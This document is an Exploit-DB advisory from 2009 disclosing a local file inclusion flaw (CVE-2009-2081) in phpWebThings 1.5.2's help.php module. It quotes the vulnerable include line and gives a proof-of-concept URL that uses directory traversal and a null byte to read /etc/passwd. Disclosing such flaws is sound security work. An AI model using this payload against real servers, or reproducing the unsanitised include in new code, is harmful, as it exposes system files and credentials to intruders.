phpWebThings <= 1.5.2 help.php module Local File Inclusion Vuln

2009-06-11T00:00:00
ID EDB-ID:8928
Type exploitdb
Reporter Br0ly
Modified 2009-06-11T00:00:00

Description

phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln. CVE-2009-2081. Webapps exploit for php platform

                                        
                                            ----------------------------------------------------------------------------------------------------

  Name : phpwebthings &lt;= 1.5.2
  Site : http://sourceforge.net/projects/phpwebthings/

  Down : http://sourceforge.net/project/downloading.php?group_id=19103&filename=phpwebthings_1_5_2.zip&a=46042396


----------------------------------------------------------------------------------------------------

 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------


  Description:

  Bug : Local File Inclusion
 
  Look this: 

    &lt;?php           theme_draw_centerbox_open("Help");
    if (isset($_GET["module"])) include("modules/{$_GET["module"]}/lang/help_{$cfg["core"]["lang"]}.php"); &lt;-- Vul 

                else include("lang/help_{$cfg["core"]["lang"]}.php");



  If magic_quotes_gpc=off --&gt; LFI;  



----------------------------------------------------------------------------------------------------


  P0c:
 
    LFI:http://localhost/Scripts/phpwebthings_1_5_2/help?module=../../../../../../../../../../../../etc/passwd%00



  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-11]